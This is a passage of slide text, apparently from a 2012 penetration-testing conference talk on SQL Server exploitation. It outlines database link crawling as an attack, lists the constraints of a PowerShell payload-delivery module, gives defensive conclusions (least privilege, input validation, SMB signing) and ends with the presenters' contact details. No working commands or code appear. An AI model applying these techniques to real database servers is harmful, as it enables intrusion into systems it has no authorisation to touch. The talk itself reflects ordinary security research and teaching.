  • 68. Database Link Crawling: Attack! asef
  • 70. Do a crazy cat disco dance! Yes. It warrants 2 disco cats!
  • 71. Database Link Chaining: Modules Current Constraints • Cannot crawl through SQL Server 2000 • Cannot enable xp_cmdshell through links • Cannot deliver payloads to systems without powershell (at the moment) • Currently, the module leaves a powershell process running on exit • Currently, doesn’t allow arbitrary query execution on linked servers
  • 72. Conclusions configure all accounts with LEAST PRIVILEGE system accounts service accounts database accounts application accounts
  • 73. Conclusions always VALIDATE INPUT web apps thick apps mobile apps web services
  • 74. Conclusions Configure SMB SIGNING
  • 75. Conclusions don’t do DRUGS
  • 76. Questions Antti Rantasaari Email: antti.rantasaari@netspi.com Scott Sutherland Email: scott.sutherland@netspi.com Blog: http://www.netspi.com/blog/author/ssutherland/ Github: http://www.github.com/nullbind/ Twitter: @_nullbind Presentation Slides http://www.slideshare.net/nullbind/sql-serverexploitationescalationandpilferingapp- secusa2012